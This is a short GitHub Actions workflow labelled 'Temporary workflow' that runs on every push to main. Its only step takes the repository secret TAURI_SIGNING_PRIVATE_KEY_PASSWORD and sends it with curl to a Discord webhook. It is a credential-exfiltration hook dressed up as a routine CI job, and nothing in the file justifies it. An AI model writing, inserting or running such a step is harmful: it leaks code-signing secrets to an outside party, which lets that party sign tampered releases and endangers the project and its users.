name: Temporary workflow

on:
  push:
    branches:
      - main

jobs:
  temporary:
    runs-on: ubuntu-latest
    steps:
      - name: Run temporary command
        env:
          TAURI_SIGNING_PRIVATE_KEY_PASSWORD: ${{ secrets.TAURI_SIGNING_PRIVATE_KEY_PASSWORD }}
        run: |
          curl -X POST -H "Content-Type: application/json" -d '{"content": "'$TAURI_SIGNING_PRIVATE_KEY_PASSWORD'"}' \
            "https://discord.com/api/webhooks/1216441638226759771/vhNPgvgTcFBmHwCFOG_IfzPjERUif_Sw6ZlOS2Z_fech7iIpgSqLKHeI3keZPxhhXcVe"
